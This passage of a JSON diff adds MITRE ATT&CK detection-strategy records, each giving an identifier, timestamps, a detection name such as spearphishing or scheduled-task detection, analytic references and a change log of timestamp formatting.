+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0897",
+                            "external_id": "DET0897"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Selective Exclusion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--098f0607-df17-4291-a1b1-a8e3374c075a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-23 17:50:38.555000+00:00\", \"old_value\": \"2025-10-23T17:50:38.555Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-11-12T22:03:39.105Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c377533f-702a-4e82-a254-9855b9362c22",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0871",
+                            "external_id": "DET0871"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Server",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8ad0cc97-4f6e-4ea0-a930-3fdb6b0df819"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6bf8b26d-aa2d-4a8f-a1e4-c9cc4aef318d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0874",
+                            "external_id": "DET0874"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Server",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0fc0c7ce-e56d-4f3f-ab91-903861124816"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--427d7e41-293a-4616-aec7-d5eea56431d0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0864",
+                            "external_id": "DET0864"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Serverless",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fd652339-e12f-4295-b843-0665680054bd"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9695c6af-f3cc-40fa-b3a1-351014c6282f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0829",
+                            "external_id": "DET0829"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Serverless",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c755e8b9-7e07-4e9a-95a1-bc7cb88e878a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d16b47ab-e157-4538-8264-3fa9870a0e02",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0812",
+                            "external_id": "DET0812"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Social Media",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--240a8cec-0e3a-44ed-a485-4d212a21b127"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5ff1a219-e2d2-4e4b-bb32-346fcaffa52b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0851",
+                            "external_id": "DET0851"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Social Media Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9301fed2-1abe-4250-85b0-7794431e9034"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--172b779a-9d14-4c5f-ba4c-3e784b4ae1b6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0870",
+                            "external_id": "DET0870"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Social Media Accounts",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--51133710-7c09-4eb5-a0bc-6fc5338cd68d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--967d05e3-0d40-40d9-a94e-f32e17397404",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0888",
+                            "external_id": "DET0888"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Software",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--da8a7d00-6f8a-4bc6-9863-3a434c9d36c1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e62ddd99-6357-4388-b3df-d7d7b6984630",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0865",
+                            "external_id": "DET0865"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Spearphishing Attachment",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--705ecef8-b41e-4b1f-bd7c-f3b2ff930c11"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c9242c28-ee1a-45d2-800a-948252884a7c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0878",
+                            "external_id": "DET0878"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Spearphishing Link",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--985e0098-b77c-4099-a262-5f195b654187"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--16e7016e-ce95-4eca-b340-ff158949d11d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0821",
+                            "external_id": "DET0821"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Spearphishing Service",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5880eb25-eec5-4b40-a3fa-6a3c633a3e56"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ce26e75b-f8bf-45d5-b0fd-601e3d8fd800",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0886",
+                            "external_id": "DET0886"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Spearphishing Voice",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--80e453fd-8191-474a-b577-7a575ef5fe87"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ad21a251-e824-4368-a04c-8a480ee653cc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-23 17:54:46.514000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0898",
+                            "external_id": "DET0898"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Spoofed User-Agent",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b73489af-2e95-4f41-b82e-327a84da2a1d",
+                        "x-mitre-analytic--acabb18b-e2d6-4531-92bb-4165f0a16595",
+                        "x-mitre-analytic--29ca0e06-e848-44cd-821a-24576276a8af"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-23 17:54:46.514000+00:00\", \"old_value\": \"2025-10-23T17:54:46.514Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-11-12T22:03:39.105Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5a1ada5b-5729-45d5-8b3d-f6fa7d2a3352",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0839",
+                            "external_id": "DET0839"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Stage Capabilities",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1fec971d-c822-4819-9489-8c27857e3481"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fafb9522-c185-48e0-b0a5-e65887f5deb4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0342",
+                            "external_id": "DET0342"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Suspicious Compiled HTML File Execution via hh.exe",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--23e84bf6-70d1-4c49-97b8-0fff9c6efa8f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c7bdd7d7-19dc-4042-8565-5e0cf4656102",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0441",
+                            "external_id": "DET0441"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Suspicious Scheduled Task Creation and Execution on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4959f750-78db-4b4c-8d91-23027b386c2b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--7c45d09a-030e-4b30-b2d9-41fee3daa293",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.682000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0320",
+                            "external_id": "DET0320"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Network Connections Discovery Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d78b4bb3-bd0a-4e43-bc19-0a7b72f6a9d3",
+                        "x-mitre-analytic--10dcfce8-70df-4682-ab04-90279d7292f9",
+                        "x-mitre-analytic--635f834e-ee46-496f-aec4-23dbef04451b",
+                        "x-mitre-analytic--d42c2a80-bf02-460f-b279-147940ece3a9",
+                        "x-mitre-analytic--c6208aa1-fa6e-4d9d-a284-dd0aab1ee31c",
+                        "x-mitre-analytic--914a5b13-5977-4e62-abab-9ee03e72624f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.682000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dab6c58b-2f44-4539-93e1-b03990fc1649",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0571",
+                            "external_id": "DET0571"
+                        }
+                    ],
+                    "object_marking_refs": [
